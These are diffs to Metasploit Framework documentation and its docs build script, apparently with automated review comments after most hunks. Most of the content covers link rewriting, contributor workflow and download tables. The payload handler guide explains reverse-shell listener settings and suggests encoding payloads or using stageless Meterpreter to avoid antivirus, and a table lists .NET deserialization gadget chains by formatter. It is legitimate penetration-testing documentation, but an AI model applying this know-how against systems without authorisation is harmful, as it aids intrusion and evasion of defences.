# prompt - msf / msf5 / msf6 / meterpreter
token :Prompt, "#{SHORTNAME}p"
# [-]
token :Error, "#{SHORTNAME}e"
# [+]
token :Good, "#{SHORTNAME}g"
# [*]
token :Status, "#{SHORTNAME}s"
# [!]
token :Warning, "#{SHORTNAME}w"
end
end
module Lexers
class MetasploitConsoleLanguage < Rouge::RegexLexer
title 'msf'
tag 'msf'
desc 'Metasploit console highlighter'
filenames []
mimetypes []
def self.keywords
@keywords ||= Set.new %w()
end
state :whitespace do
rule %r/\s+/, Text
end
state :root do
mixin :whitespace
# Match msf, msf5, msf6, meterpreter
rule %r{^(msf\d?|meterpreter)}, Tokens::Msf::Prompt, :msf_prompt
rule %r{^\[-\]}, Tokens::Msf::Error
rule %r{^\[\+\]}, Tokens::Msf::Good
rule %r{^\[\*\]}, Tokens::Msf::Status
rule %r{^\[\!\]}, Tokens::Msf::Warning
rule %r{.+}, Text
end
# State for highlighting the prompt such as
# msf6 auxiliary(admin/dcerpc/cve_2022_26923_certifried) >
state :msf_prompt do
mixin :whitespace
rule %r{exploit|payload|auxiliary|encoder|evasion|post|nop}, Text
rule %r{\(}, Punctuation
rule %r{\)}, Punctuation
rule %r{[\w/]+}, Keyword::Constant
rule %r{>}, Punctuation, :pop!
end
end
end
end
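Review bot: in `:msf_prompt` the module-type alternation `exploit|payload|auxiliary|encoder|evasion|post|nop` has no word boundaries, and the state only pops on `>`. Two consequences: a module path whose first segment begins with one of those words is split between `Text` and `Keyword::Constant`, and a prompt line without the trailing `>` (a wrapped or truncated transcript line) leaves the lexer in `:msf_prompt` for every following line, where any character other than whitespace, `(`, `)`, `>` and `[\w/]` has no rule and is emitted as an error token. Wrap the alternation in `\b...\b` and add `rule %r{\n}, Text, :pop!` ahead of the `:whitespace` mixin (which currently swallows the newline) so the state cannot leak across lines. `def self.keywords` returns an empty set and is never referenced; drop it.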
+66 -12
@@ -2,6 +2,7 @@ require 'fileutils'
require 'uri'
require 'open3'
require 'optparse'
require 'did_you_mean'
require_relative './navigation'
# This build module was used to migrate the old Metasploit wiki https://github.com/rapid7/metasploit-framework/wiki into a format
@@ -48,13 +49,18 @@ module Build
def validate!
configured_paths = all_file_paths
missing_paths = available_paths.map { |path| path.gsub("#{WIKI_PATH}/", '') } - ignored_paths - existing_docs - configured_paths
raise ConfigValidationError, "Unhandled paths #{missing_paths.join(', ')}" if missing_paths.any?
raise ConfigValidationError, "Unhandled paths #{missing_paths.join(', ')} - add navigation entries to navigation.rb for these files" if missing_paths.any?
each do |page|
page_keys = page.keys
allowed_keys = %i[old_wiki_path path new_base_name nav_order title new_path folder children has_children parents]
invalid_keys = page_keys - allowed_keys
raise ConfigValidationError, "#{page} had invalid keys #{invalid_keys.join(', ')}" if invalid_keys.any?
suggestion = DidYouMean::SpellChecker.new(dictionary: allowed_keys).correct(invalid_keys[0]).first
error = "#{page} had invalid keys #{invalid_keys.join(', ')}."
error += " Did you mean #{suggestion}?" if suggestion
raise ConfigValidationError, error if invalid_keys.any?
end
# Ensure unique folder names
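Review bot: the DidYouMean lookup runs for every page before `invalid_keys.any?` is checked, so on the normal path `invalid_keys[0]` is `nil` and `correct(nil)` is evaluated needlessly; it also only suggests a correction for the first bad key. Guard the block with `next if invalid_keys.empty?` (or move the `raise` condition up) and build one suggestion per key, e.g. `invalid_keys.map { |k| checker.correct(k).first }`, so an author with two typos is told about both.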
@@ -181,16 +187,22 @@ module Build
@config.enum_for(:each).map { |page| page }
end
# scans for absolute links to the old wiki such as 'https://github.com/rapid7/metasploit-framework/wiki/Metasploit-Web-Service'
# scans for absolute links to the old wiki such as 'https://docs.metasploit.com/docs/using-metasploit/advanced/metasploit-web-service.html'
def extract_absolute_wiki_links(markdown)
new_links = {}
markdown.scan(%r{(https?://github.com/rapid7/metasploit-framework/wiki/([\w().%_-]+))}) do |full_match, old_path|
markdown.scan(%r{(https?://github.com/rapid7/metasploit-framework/wiki/([\w().%_#-]+))}) do |full_match, old_path|
full_match = full_match.gsub(/[).]+$/, '')
old_path = URI.decode_www_form_component(old_path.gsub(/[).]+$/, ''))
new_path = new_path_for(old_path)
replacement = "{% link docs/#{new_path} %}"
begin
old_path_anchor = URI.parse(old_path).fragment
rescue URI::InvalidURIError
old_path_anchor = nil
end
new_path = new_path_for(old_path, old_path_anchor)
replacement = "{% link docs/#{new_path} %}#{old_path_anchor ? "##{old_path_anchor}" : ""}"
link = {
full_match: full_match,
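Review bot: the updated comment gives `https://docs.metasploit.com/docs/using-metasploit/advanced/metasploit-web-service.html` as the example of what this method scans for, but the regex still matches only `github.com/rapid7/metasploit-framework/wiki/...` URLs; either keep an old-wiki URL as the example or say the method rewrites old-wiki links into docs links. Separately, `URI.parse(old_path)` runs on the form-decoded path, so a decoded `%20` or a parenthesis in the page name raises `URI::InvalidURIError` and the anchor is silently discarded; `old_path.split('#', 2)` extracts the fragment without that failure mode.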
@@ -210,19 +222,26 @@ module Build
# '[[Custom name|Relative Path]]'
# '[[Custom name|relative-path]]'
# '[[Custom name|./relative-path.md]]'
# '[[Custom name|./relative-path.md#section-anchor-to-link-to]]'
# Note that the page target resource file is validated for existence at build time - but the section anchors are not
def extract_relative_links(markdown)
existing_links = @links
new_links = {}
markdown.scan(/(\[\[([\w\/_ '().:,-]+)(?:\|([\w\/_ '():,.-]+))?\]\])/) do |full_match, left, right|
markdown.scan(/(\[\[([\w\/_ '().:,-]+)(?:\|([\w\/_ '():,.#-]+))?\]\])/) do |full_match, left, right|
old_path = (right || left)
new_path = new_path_for(old_path)
begin
old_path_anchor = URI.parse(old_path).fragment
rescue URI::InvalidURIError
old_path_anchor = nil
end
new_path = new_path_for(old_path, old_path_anchor)
if existing_links[full_match] && existing_links[full_match][:new_path] != new_path
raise "Link for #{full_match} previously resolved to #{existing_links[full_match][:new_path]}, but now resolves to #{new_path}"
end
link_text = left
replacement = "[#{link_text}]({% link docs/#{new_path} %})"
replacement = "[#{link_text}]({% link docs/#{new_path} %}#{old_path_anchor ? "##{old_path_anchor}" : ""})"
link = {
full_match: full_match,
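Review bot: the link regex explicitly allows spaces and parentheses in the target (`[\w\/_ '():,.#-]+`, per the `'[[Custom name|Relative Path]]'` comment), but `URI.parse(old_path)` rejects both, so for exactly those targets the `rescue URI::InvalidURIError` branch sets `old_path_anchor` to `nil` and a `#section` suffix is silently dropped from the replacement. Use `old_path.split('#', 2)` for the fragment instead of parsing the target as a URI, and consider failing the build when the target contains `#` but no anchor was extracted.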
@@ -239,8 +258,17 @@ module Build
new_links
end
def new_path_for(old_path)
old_path = old_path.gsub(' ', '-')
def new_path_for(old_path, old_path_anchor)
# Strip out any leading `./` or `/` before the relative path.
# This is needed for our later code that does additional filtering for
# potential ambiguity with absolute paths since those comparisons occur
# against filenames without the leading ./ and / parts.
old_path = old_path.gsub(/^[.\/]+/, '')
# Replace any spaces in the file name with - separators, then
# make replace anchors with an empty string.
old_path = old_path.gsub(' ', '-').gsub("##{old_path_anchor}", '')
matched_pages = pages.select do |page|
!page[:folder] &&
(File.basename(page[:path]).downcase == "#{File.basename(old_path)}.md".downcase ||
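Review bot: when `old_path_anchor` is `nil`, `gsub("##{old_path_anchor}", '')` becomes `gsub("#", '')`, which strips only the hash and leaves the anchor text glued to the file name (`Relative-Pathsection`), so the later lookup fails with a misleading `Link not found`. Split once on `#` (`old_path = old_path.split('#', 2).first`) instead of deleting the interpolated anchor, and fix the comment `make replace anchors with an empty string`, which does not parse. Note also that `gsub(/^[.\/]+/, '')` strips `../` as well as `./`, so a parent-relative link is resolved as if it were page-relative.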
@@ -249,8 +277,20 @@ module Build
if matched_pages.empty?
raise "Link not found: #{old_path}"
end
# Additional filter for absolute paths if there's potential ambiguity
if matched_pages.count > 1
raise "Duplicate paths for #{old_path}"
refined_pages = matched_pages.select do |page|
!page[:folder] &&
(page[:path].downcase == "#{old_path}.md".downcase ||
page[:path].downcase == old_path.downcase)
end
if refined_pages.count != 1
page_paths = matched_pages.map { |page| page[:path] }
raise "Duplicate paths for #{old_path} - possible page paths found: #{page_paths}"
end
matched_pages = refined_pages
end
matched_pages.first.fetch(:new_path)
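Review bot: when the basename is ambiguous and no page matches the exact path, `refined_pages.count` is 0 but the error still says `Duplicate paths for ...`, which points the author at the wrong problem; report the two cases separately (no exact path match versus more than one). The `!page[:folder]` test inside the refinement is redundant, since `matched_pages` was already filtered on it.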
@@ -281,6 +321,9 @@ module Build
]
# These tags look like Github/Twitter handles, but are actually ruby/java code snippets
ignored_tags = [
'@spid',
'@adf3',
'@LDAP-DC3',
'@harmj0yDescription',
'@phpsessid',
'@http_client',
@@ -547,6 +590,13 @@ module Build
FileUtils.remove_dir(RELEASE_BUILD_ARTIFACTS, true)
run_command('JEKYLL_ENV=production bundle exec jekyll build')
if options[:serve]
ReleaseBuildServer.run
end
elsif options[:staging]
FileUtils.remove_dir(RELEASE_BUILD_ARTIFACTS, true)
run_command('JEKYLL_ENV=production bundle exec jekyll build --config _config.yml,_config_staging.yml')
if options[:serve]
ReleaseBuildServer.run
end
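Review bot: the staging branch duplicates the production branch verbatim, including the `if options[:serve]` block, with `--config _config.yml,_config_staging.yml` as the only difference; pull the `jekyll build` invocation into one path with the config list as the only variable. Because the branches are joined by `elsif`, passing `--production --staging` together silently runs a production build; either reject the combination in the option parser or document that `--production` wins.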
@@ -572,6 +622,10 @@ if $PROGRAM_NAME == __FILE__
options[:production] = production
end
opts.on('--staging', 'Run a staging build for deploying to gh-pages') do |staging|
options[:staging] = staging
end
opts.on('--serve', 'serve the docs site') do |serve|
options[:serve] = serve
end
+1 -1
@@ -1,3 +1,3 @@
View the latest API docs at:
[https://rapid7.github.io/metasploit-framework/api/](https://rapid7.github.io/metasploit-framework/api/)
[https://docs.metasploit.com/api/](https://docs.metasploit.com/api/)
@@ -5,8 +5,6 @@ can be used to verify merge commits made to <https://github.com/rapid7/metasploi
Keybase.io is used by Metasploit as an easy way to verify identities of committers. If you're a committer on metasploit-framework, and you need an invite, just ask.
<sup>Altering this table's layout will almost certainly break [import-dev-keys.sh](https://github.com/rapid7/metasploit-framework/blob/master/tools/dev/import-dev-keys.sh), so please don't.</sup>
| Github Username | Keybase.io Username |
| ------------------------------------------------- | -------------------------------------------------- |
| [@adfoster-r7](https://github.com/adfoster-r7) | [adfosterr7](https://keybase.io/adfosterr7) |
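Review bot: this hunk deletes the warning that `tools/dev/import-dev-keys.sh` parses this table's layout, but the table itself is unchanged and the diff shows no change to that script. If the script still reads this page, removing the warning invites a layout edit that breaks key import; if it was retired or rewritten, say so in the commit message.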
@@ -78,7 +76,7 @@ Please select what kind of key you want:
(4) RSA (sign only)
Your selection? 4
RSA keys may be between 1024 and 4096 bits long.
What keysize do you want? (2048)
What keysize do you want? (2048)
Requested keysize is 2048 bits
Please specify how long the key should be valid.
0 = key does not expire
@@ -96,7 +94,7 @@ from the Real Name, Comment and Email Address in this form:
Real name: Dade Murphy
Email address: dmurphy@thegibson.example
Comment:
Comment:
You selected this USER-ID:
"Dade Murphy <dmurphy@thegibson.example>"
@@ -120,7 +118,7 @@ Enter passphrase: [...]
Using `git c` and `git m` from now on will sign every commit with your `DEADBEEF` key. However, note that rebasing or cherry-picking commits will change the commit hash, and therefore, unsign the commit -- to resign the most recent, use `git c --amend`.
[msf-committers]:https://github.com/rapid7/metasploit-framework/wiki/Committer-Rights
[msf-committers]:https://docs.metasploit.com/docs/development/maintainers/committer-rights.html
[pro-sharing]:https://filippo.io/on-keybase-dot-io-and-encrypted-private-key-sharing/
[con-sharing]:https://www.tbray.org/ongoing/When/201x/2014/03/19/Keybase#p-5
[tracking]:https://github.com/keybase/keybase-issues/issues/100
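Review bot: `[msf-committers]` is rewritten to an absolute `https://docs.metasploit.com/...` URL, whereas the other doc changes in this series convert wiki links to the `[[text|./path.md]]` form that build.rb resolves and validates at build time. An absolute docs-site URL escapes that check and will 404 silently if the page is renamed; since a reference-style definition cannot take the `[[...]]` form, either convert the uses of `[msf-committers]` to inline `[[...]]` links or accept that this URL is unvalidated and note it.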
@@ -2,7 +2,7 @@
The term "Metasploit Committers" describes people who have direct write access to the [Rapid7 Metasploit-Framework fork](https://github.com/rapid7/metasploit-framework). These are the people who can land changes to this main fork of the Framework. However, it is not necessary to have committer rights in order to contribute to Metasploit. Much of our code comes from non-committers.
We encourage anyone to fork the Metasploit project, make changes, fix bugs, and notify the core committers about those changes via [Pull Requests](http://github.com/rapid7/metasploit-framework/pulls). The process for getting started is most comprehensively documented in the [Metasploit Development Environment](https://github.com/rapid7/metasploit-framework/wiki/Setting-Up-a-Metasploit-Development-Environment) setup guide.
We encourage anyone to fork the Metasploit project, make changes, fix bugs, and notify the core committers about those changes via [Pull Requests](http://github.com/rapid7/metasploit-framework/pulls). The process for getting started is most comprehensively documented in the [[Metasploit Development Environment|./dev/Setting-Up-a-Metasploit-Development-Environment.md]] setup guide.
Metasploit committers are a mix of [Rapid7](http://rapid7.com) employees and outside contributors. Anyone can become a contributor, with the following expectations:
@@ -24,7 +24,7 @@ If you reject a pull request, be clear in the pull request why it was rejected,
Even if someone else approves of a pull request, and it is shown to be broken later, then it is still your responsibility to correct it. Make every effort to get a fix or revert in as soon as possible, whether you wrote the code, landed it, or approved it. Blame is shared equally.
A list of committer public keys [is here](https://github.com/rapid7/metasploit-framework/wiki/Committer-Keys).
A list of committer public keys [[is here|./Committer-Keys.md]].
# How to Gain Commit Rights
@@ -45,7 +45,7 @@ Breaches of trust in terms of malicious or malformed code, or the demonstration
# Useful Links for Committers
* [http://r-7.co/MSF-DEV](https://github.com/rapid7/metasploit-framework/wiki/Setting-Up-a-Metasploit-Development-Environment) is pretty much required reading.
* [[Setting Up a Metasploit Development Environment|./dev/Setting-Up-a-Metasploit-Development-Environment.md]] is pretty much required reading.
* So is [CONTRIBUTING.md](https://github.com/rapid7/metasploit-framework/blob/master/CONTRIBUTING.md)
* Check out the Apache Software Foundation's [Guide for Committers](https://www.apache.org/dev/committers). It's illuminating.
* [Producing Open Source Software](http://www.producingoss.com/gl/) by Ken Fogel is a must-read.
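Review bot: the unchanged context line credits Producing Open Source Software to "Ken Fogel"; the author is Karl Fogel. Worth correcting while this link list is being edited.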
@@ -358,7 +358,6 @@ Pulling it all together, we get a new `ftp_login` module that looks something li
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'metasploit/framework/credential_collection'
require 'metasploit/framework/login_scanner/ftp'
@@ -472,4 +471,4 @@ class Metasploit3 < Msf::Auxiliary
end
end
end
```
```
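Review bot: the hunk header shows this sample module still declares `class Metasploit3 < Msf::Auxiliary`, while the exploit template elsewhere in this same change uses `class MetasploitModule`; the `ftp_login` sample should be updated to the current class name so readers do not copy the deprecated one when the surrounding lines are being reflowed anyway.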
@@ -6,13 +6,13 @@ whilst also avoiding some common pitfalls and learning how some of our systems w
## Initial Steps and Important Notes
The rest of this guide assumes you have already followed the steps at [Setting Up A Developer Environment](https://r-7.co/MSF-DEV) in order to get
a fork of Metasploit set up and ready to run, and that you have added in your SSH keys
(see [Adding a New SSH Key To Your GitHub Account](https://docs.github.com/en/authentication/connecting-to-github-with-ssh/adding-a-new-ssh-key-to-your-github-account)),
a fork of Metasploit set up and ready to run, and that you have added in your SSH keys
(see [Adding a New SSH Key To Your GitHub Account](https://docs.github.com/en/authentication/connecting-to-github-with-ssh/adding-a-new-ssh-key-to-your-github-account)),
set up Ruby and optionally the PostgreSQL database, and done any custom shortcuts you wish to configure.
## Getting the Latest Version of Metasploit Framework
Before making any new contributions, you will want to sure you are running the latest version of Metasploit Framework.
To do this run `git checkout master && git fetch upstream && git pull`, where `upstream` is the branch connected to the
To do this run `git checkout master && git fetch upstream && git pull`, where `upstream` is the branch connected to the
Rapid7 remote, aka Rapid7's copy of the code. You can verify that `upstream` is set correctly by running `git remote get-url upstream`
and verifying it is set to `git@github.com:rapid7/metasploit-framework.git`.
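Review bot: `git checkout master && git fetch upstream && git pull` only brings in Rapid7's changes if the local `master` tracks `upstream/master`; with the fork setup this guide describes, `master` normally tracks `origin`, so the bare `git pull` would merge from the fork, not from Rapid7. Naming the source explicitly, e.g. `git pull upstream master`, removes the ambiguity. Two smaller points in the same hunk: `upstream` is a remote, not a branch, so "where `upstream` is the branch connected to the Rapid7 remote" should say remote; "you will want to sure you are running" should read "you will want to be sure"; and the retained `[Setting Up A Developer Environment](https://r-7.co/MSF-DEV)` link still goes through the r-7.co shortener that the other hunks in this change replace with the in-repo wiki path.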
@@ -51,13 +51,13 @@ done when the code is ready to be landed into Metasploit Framework to help make
## Checking for Code Errors
Before code can be accepted into Metasploit Framework, it must also pass our RuboCop and MsfTidy rules. These help ensure that
all contributors are committing code that follows a common set of standards. To check if your code meets our RuboCop standards,
all contributors are committing code that follows a common set of standards. To check if your code meets our RuboCop standards,
from the root of wherever you cloned your fork of Metasploit Framework to on disk, run `rubocop <path to your module from current directory>`.
Specifying the `-a` parameter will ask RuboCop to check your module and if possible fix any issues that RuboCop is able to fix.
In this case the command would be `rubocop -a <path to your module from current directory>`. It is encouraged to keep running
this command and fixing any issues that come up until RuboCop no longer comes back with any errors to report. Once this is
complete, run `git add <file>` followed by `git commit -m "RuboCop Fixes"`. You can change the commit message if you
In this case the command would be `rubocop -a <path to your module from current directory>`. It is encouraged to keep running
this command and fixing any issues that come up until RuboCop no longer comes back with any errors to report. Once this is
complete, run `git add <file>` followed by `git commit -m "RuboCop Fixes"`. You can change the commit message if you
want, but it should mention RuboCop as it helps maintainers know what the commit is related to.
As a good practice rule, you should always separate your commits that contain RuboCop changes from those that contain non-RuboCop related changes.
@@ -71,8 +71,8 @@ against your module code (if applicable), using `tools/dev/msftidy.rb <path to m
if your module passed the tests. Try and fix any errors mentioned here.
## Writing Documentation
The next step to do, if you are writing a module, is to write the documentation for the module. You can find some information
on how to write module documentation at [Writing Module Documentation](https://docs.metasploit.com/docs/development/quality/writing-module-documentation.html).
The next step to do, if you are writing a module, is to write the documentation for the module. You can find some information
on how to write module documentation at [[Writing Module Documentation|./Writing-Module-Documentation.md]].
In general when writing documentation you will want to search for a similar documentation file under the `documentation`
folder located in the root of the Metasploit fork. You can then copy one of these files and use it as the basis for writing
@@ -91,15 +91,15 @@ these may be okay to ignore depending on the context. A good example is if a lin
safely ignored.
## Submitting Your Changes and Opening a PR
Once you have gone through all of the steps above you should be ready to submit your PR. To submit your PR, first check which
branch points to your copy of the code. If you have followed the setup guide, it should be `origin`. You can double check this
Once you have gone through all of the steps above you should be ready to submit your PR. To submit your PR, first check which
branch points to your copy of the code. If you have followed the setup guide, it should be `origin`. You can double check this
branch's remote URL using `git remote get-url origin`. It should look something like `git@github.com:gwillcox-r7/metasploit-framework`
with `gwillcox-r7` substituted for your username.
Assuming the `origin` branch is in fact pointing to your copy of the code, run `git push origin local-branch:remote-branch`
and replace `local-branch` with the branch locally where your code changes are located, and `remote-branch` with what
you want this branch to be called on the remote repository, aka `origin` which will be your fork on GitHub.com. In most
cases you will want these two names to be the same to avoid confusion, but its good to know this syntax should you
Assuming the `origin` branch is in fact pointing to your copy of the code, run `git push origin local-branch:remote-branch`
and replace `local-branch` with the branch locally where your code changes are located, and `remote-branch` with what
you want this branch to be called on the remote repository, aka `origin` which will be your fork on GitHub.com. In most
cases you will want these two names to be the same to avoid confusion, but its good to know this syntax should you
start working with more complex situations. Note that if the branch pointing to your copy of the code is not named `origin`,
replace the word `origin` in the command above with the name of the branch that does point to your copy of the code.
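Review bot: `origin` is a remote, not a branch; the retained sentences "check which branch points to your copy of the code" and "if the branch pointing to your copy of the code is not named `origin`" should say remote, which also matches the `git remote get-url origin` command they refer to. Minor: "its good to know this syntax" should be "it's good to know".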
@@ -114,10 +114,10 @@ Compressing objects: 100% (8/8), done.
Writing objects: 100% (8/8), 1.55 KiB | 1.55 MiB/s, done.
Total 8 (delta 7), reused 0 (delta 0), pack-reused 0
remote: Resolving deltas: 100% (7/7), completed with 7 local objects.
remote:
remote:
remote: Create a pull request for 'update_mssql_lib_parameters' on GitHub by visiting:
remote: https://github.com/gwillcox-r7/metasploit-framework/pull/new/update_mssql_lib_parameters
remote:
remote:
To github.com:gwillcox-r7/metasploit-framework
* [new branch] update_mssql_lib_parameters -> update_mssql_lib_parameters
```
@@ -46,13 +46,13 @@ Any user of Metasploit will tell you that they know what `LHOST` and `LPORT` mea
A **handler** obviously needs to listen on a host/IP for the incoming connection. In cases where the `LHOST` value, for example the address that the target is able to reach, is the same as that which the host can listen on, no extra work has to be done. The `LHOST` value is used by the handler.
However, if some kind of NAT or port forward is enabled, or if the handler is behind a firewall, then setting `LHOST` isn't enough. In order to listen on the appropriate interface, another setting must be used called `ReverseListenerBindHost`. This value tells the **handler** to listen on a different interface/IP, but it doesn't change the fact that the `LHOST` value is given to the target when the **stage** is uploaded.
However, if some kind of NAT or port forward is enabled, or if the handler is behind a firewall, then setting `LHOST` isn't enough. In order to listen on the appropriate interface, another setting must be used called `ReverseListenerBindAddress`. This value tells the **handler** to listen on a different interface/IP, but it doesn't change the fact that the `LHOST` value is given to the target when the **stage** is uploaded.
In short, `LHOST` must always remain the IP/host that is routable from the target, and if this value is not the same as what the listener needs to bind to, then change the `ReverseListenerBindHost` value. If you're attacking something across the Internet and you specify an internal IP in `LHOST`, you're doing it wrong.
In short, `LHOST` must always remain the IP/host that is routable from the target, and if this value is not the same as what the listener needs to bind to, then change the `ReverseListenerBindAddress` value. If you're attacking something across the Internet and you specify an internal IP in `LHOST`, you're doing it wrong.
## LPORT
The principles of `LHOST` and `ReverseListenerBindHost` can be applied to `LPORT` and `ReverseListenerBindPort` as well. If you have port forwarding in place, and your listener needs to bind to a different port, then you need to make use of the `ReverseListenerBindPort` setting.
The principles of `LHOST` and `ReverseListenerBindAddress` can be applied to `LPORT` and `ReverseListenerBindPort` as well. If you have port forwarding in place, and your listener needs to bind to a different port, then you need to make use of the `ReverseListenerBindPort` setting.
The classic example of this case is where an attacker wants to make use of port `443`, but rightfully doesn't want to run Metasploit as `root` just so they can directly bind to ports lower than `1024`. Instead, the set up a port forward (on their router, or using `iptables`) so that `443` forwards to `8443`, with a goal of accepting connections on that port instead.
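Review bot: the rename from `ReverseListenerBindHost` to `ReverseListenerBindAddress` is consistent with the `ReverseListenerBindPort` option named in the same hunk and with the datastore option the handler actually reads, so the old name would have silently done nothing for readers who followed it. In the unchanged last line, "Instead, the set up a port forward" should read "Instead, they set up a port forward".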
@@ -75,4 +75,4 @@ There are a few things to check for when debugging a dead shell.
### Not so quick things to check
* If the target is running AntiVirus there's a chance that the **stage** , for example `metsrv`, is being caught while being uploaded. `reverse_tcp` and `reverse_http` **stagers** download `metsrv` _without_ any encryption, and so the content of the DLL is visible to anything watching on the wire. `reverse_https` can still get caught in cases where AV is doing MITM content inspection. In this case, consider encoding your payloads, or if possible using stageless Meterpreter instead.
* If the target is running AntiVirus there's a chance that the **stage** , for example `metsrv`, is being caught while being uploaded. `reverse_tcp` and `reverse_http` **stagers** download `metsrv` _without_ any encryption, and so the content of the DLL is visible to anything watching on the wire. `reverse_https` can still get caught in cases where AV is doing MITM content inspection. In this case, consider encoding your payloads, or if possible using stageless Meterpreter instead.
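Review bot: the removed and added lines render identically, so this appears to be a whitespace-only change; since the line is being touched anyway, drop the stray space before the comma in `**stage** ,`.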
@@ -12,7 +12,7 @@ compatibility of each.
| Gadget Chain Name | BinaryFormatter | LosFormatter | SoapFormatter |
| --------------------------- | --------------- | ------------ | ------------- |
| ClaimsPrincipal | Yes | Yes | Yes |
| ClaimsPrincipal | Yes | Yes | Yes |
| TextFormattingRunProperties | Yes | Yes | Yes |
| TypeConfuseDelegate | Yes | Yes | No |
| WindowsIdentity | Yes | Yes | Yes |
@@ -134,5 +134,5 @@ payloads such as Meterpreter.
[5]: https://github.com/rapid7/metasploit-framework/tree/master/lib/msf/util/dot_net_deserialization/types
[6]: https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/util/dot_net_deserialization.rb
[7]: https://github.com/rapid7/metasploit-framework/blob/master/spec/lib/msf/util/dot_net_deserialization_spec.rb
[8]: https://github.com/rapid7/metasploit-framework/wiki/How-to-use-command-stagers
[9]: https://github.com/rapid7/metasploit-framework/wiki/How-to-use-Powershell-in-an-exploit
[8]: https://docs.metasploit.com/docs/development/developing-modules/guides/how-to-use-command-stagers.html
[9]: https://docs.metasploit.com/docs/development/developing-modules/libraries/how-to-use-powershell-in-an-exploit.html
@@ -12,8 +12,10 @@ The pgp signatures below can be verified with the following [public key](https:/
|Download Link|File Type|SHA1|PGP|
|-|-|-|-|
| [metasploit-4.21.1-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe.asc)|
| [metasploit-4.21.1-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run) | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run.sha1) | [PGP](https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run.asc)|
| [metasploit-4.22.0-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe.asc)|
| [metasploit-4.22.0-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run) | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run.sha1) | [PGP](https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run.asc)|
| [metasploit-4.21.1-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.1-2023011701-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.1-2023011701-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.1-2023011701-windows-x64-installer.exe.asc)|
| [metasploit-4.21.1-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.1-2023011701-linux-x64-installer.run) | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.1-2023011701-linux-x64-installer.run.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.1-2023011701-linux-x64-installer.run.asc)|
| [metasploit-4.21.0-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.0-2022052401-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.0-2022052401-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.0-2022052401-windows-x64-installer.exe.asc)|
| [metasploit-4.21.0-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.0-2022052401-linux-x64-installer.run) | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.0-2022052401-linux-x64-installer.run.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.0-2022052401-linux-x64-installer.run.asc)|
| [metasploit-4.20.0-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.20.0-2021112001-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.20.0-2021112001-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.20.0-2021112001-windows-x64-installer.exe.asc)|
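Review bot: the two new 4.22.0 rows link to the `metasploit-latest-*` files rather than to a pinned archive path, so their "4.22.0" labels will go stale the next time "latest" moves, while the 4.21.1 and 4.21.0 rows below are pinned to dated archive files. Consider pointing the versioned 4.22.0 rows at their dated archive files in the same way and keeping a separate row for the latest installer if one is wanted.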
@@ -0,0 +1,61 @@
GSoC Project Ideas in no particular order. When you've picked one, take a look at [[How-to-Apply-to-GSoC]] for how to make a proposal.
Mentors: @jmartin-r7, @gwillcox-r7
Slack Contacts: @Op3n4M3, @gwillcox-r7 on [Metasploit Slack](https://metasploit.slack.com/)
For any questions about these projects reach out on the Metasploit Slack in the `#gsoc` channel or DM one of the mentors using the Slack contacts listed above. Note that mentors may be busy so please don't expect an immediate response, however we will endeavor to respond as soon as possible. If you'd prefer not to join Slack, you can also email `msfdev [@] metasploit [dot] com` and we will respond to your questions there if email is preferable.
## Enhance Metasploit Framework
### Rest API Pagination
Metasploit provides two API interaction services, a Rest API service and an RPC service. Previous efforts have wrapped and exposed the RPC service as JSON responses available from the Rest API endpoint. This wrapping did not account for possible large responses that may benefit from pagination. A previous contributor attempted to add this functionality for a [limited set of RCP commands](https://github.com/rapid7/metasploit-framework/pull/13439) however review identified that the changes would introduce changes to the documented public API and also introduce inconsistency within the API responses resulting in a fluctuating public API. Modern pagination would be beneficial to increasing user adoption of Rest API services provided it can be implemented consistently and either maintain compatibility of the existing public RPC service or generate a one time migration across all exposed public APIs.
Size: Large
Difficulty: 4/5
### LDAP Capture Capabilities
